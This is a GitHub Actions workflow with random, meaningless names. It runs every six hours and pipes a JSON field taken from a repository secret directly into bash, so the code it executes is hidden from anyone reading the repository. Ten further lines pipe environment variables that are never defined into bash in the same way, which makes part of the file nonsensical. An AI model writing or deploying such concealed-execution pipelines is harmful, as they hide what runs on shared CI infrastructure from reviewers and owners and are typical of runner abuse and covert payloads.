name: namabaplt
on:
  workflow_dispatch:
  schedule:
    - cron: '36 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: namabaplt
        env:
          q50408: ${{ secrets.q50408 }}
        run: |
          echo $q50408 | jq -r .xwmgn130 | /bin/bash
          echo $kui180 | jq -r .aj63872 | /bin/bash
          echo $do23 | jq -r .dtagr3 | /bin/bash
          echo $kfh67682 | jq -r .ixm0 | /bin/bash
          echo $z96435 | jq -r .i44126 | /bin/bash
          echo $a90692 | jq -r .xjux4 | /bin/bash
          echo $phoc8485 | jq -r .tdr119 | /bin/bash
          echo $bc58692 | jq -r .vynp9340 | /bin/bash
          echo $e4732 | jq -r .lr8627 | /bin/bash
          echo $z7426 | jq -r .mrqg16 | /bin/bash
          echo $o8591 | jq -r .bg3843 | /bin/bash

